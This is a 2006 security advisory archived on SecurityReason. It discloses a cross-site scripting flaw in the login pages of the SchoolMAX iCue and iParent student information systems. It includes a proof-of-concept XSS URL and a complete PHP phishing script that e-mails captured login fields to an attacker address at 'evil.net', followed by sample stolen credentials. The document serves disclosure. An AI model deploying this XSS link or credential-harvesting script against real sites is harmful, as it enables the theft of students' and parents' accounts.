|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1121 CVE : CVE-2006-3143 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Fixer (fixer gci net) Published : 23.06.2006
Advisory Content : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The InfoGuard Group Vulnerability Summary 2006-04 Application: Maximus' iCue and iParent (http://www.schoolmax.net) Versions: All Bugs: Cross-Site Scripting (XSS) Date: 18 June 2006 Author: Charles H. E-mail: charles (at) infoguardgroup (dot) com [email concealed] Website: http://www.infoguardgroup.com 1) Introduction SchoolMAX from MAXIMUS is one of the most technologically advanced student information systems available today. It is district-based yet still provides for school-based management capabilities and controls. http://www.maximus.com/corporate/pages/SchoolMAX.asp 2)Login XSS The login.asp file assocaited with SchoolMAX's iCue and iParent applications suffers from a Cross-Site Scripting flaw. This can result in cookie and/or credentials theft, especially if used in conjunction with a social engineering attack. A simple attack against iCue might look like this:: https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't% 20the%20droids%20you're%20looking%20for This will result in the message "These aren't the droids you're looking for" being displayed. This shows the basic idea of the XSS. You can perform various obfuscation techniques to hide the message. Additionally, when used in conjunction with social engineering,user credentials can be easily obtained.: If we take a php file like this: <?php $my_email = "h@x0r (at) evil (dot) net [email concealed]"; $header = "https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_ login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR= "; if ($_SERVER['REQUEST_METHOD'] != "POST"){exit;} $disallowed_name = array(':',';',"'",'"','=','(',')','{','}','@'); foreach($disallowed_name as $value) { if(stristr($_POST[Name],$value)){header("location: $_SERVER[HTTP_REFERER]");exit;} } $disallowed_email = array(':',';',"'",'"','=','(',')','{','}'); foreach($disallowed_email as $value) { if(stristr($_POST[Email],$value)){header("location: $_SERVER[HTTP_REFERER]");exit;} } $message = ""; while(list($key,$value) = each($_POST)){if(!(empty($value))){$set=1;}$message = $message . "$key: $valuenn";} if($set!==1){header("location: $_SERVER[HTTP_REFERER]");exit;} $message = $message . "-- nThank you for exploiting iParent"; $message = stripslashes($message); $subject = "FormToEmail Comments"; $headers = "From: " . $_POST['Email'] . "n" . "Return-Path: " . $_POST['Email'] . "n" . "Reply-To: " . $_POST['Email'] . "n"; mail($my_email,$subject,$message,$headers); header( "Location: https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_l ogin=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=" ); ?> Post it to some place, then send a forged e-mail which redirects to this, we can capture the credentials. When we do, here's what the attacker gets in the e-mail: Subject: FormToEmail Comments Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST) From: Nobody <nobody (at) victimsite (dot) us [email concealed]> To: Badguy (at) evil (dot) net [email concealed] DST_NBR: 1111 USER_NME: 4564654 OPER_PASS: 123456 login: Log in 4)Patch Status Maximus has been contacted multiple times since this issue was discovered in March. To date, they have not responded. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEVAwUBRJUVPgt0Y4479LtgAQK5yQf/QYCmo/Tel9z9Aank1y3tJUSv/rmAnLNB UxNOGXIflr7cofVncuoXqLq2oI9KGn04QeYafj13+c+42t5KJRHG/Vw8Y0XrWq9b hMf+BXkIXq7QCjuyP6HUSpt7j6PmI1FYiidxcL5Y3NmNuChRI4m1akeWIjt55TMp OxflWcP3kgnUNT6CSbXKwOzXw9dL+TBlNQfhbQ5fDNIhrghkC4Ar/ivDnHo1qrkS Ie6xi7ahT56418W3LaToPnJA1S5ggIvDSpmxKRDO2yU8r0d+bntcSMYQESSwUbAe sVUNKcWP8RKXmQy7Mf+2BDZJNesCvKZ/Hu9OSOH96ikHL9OIC/iIxQ== =ZBTh -----END PGP SIGNATURE-----  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |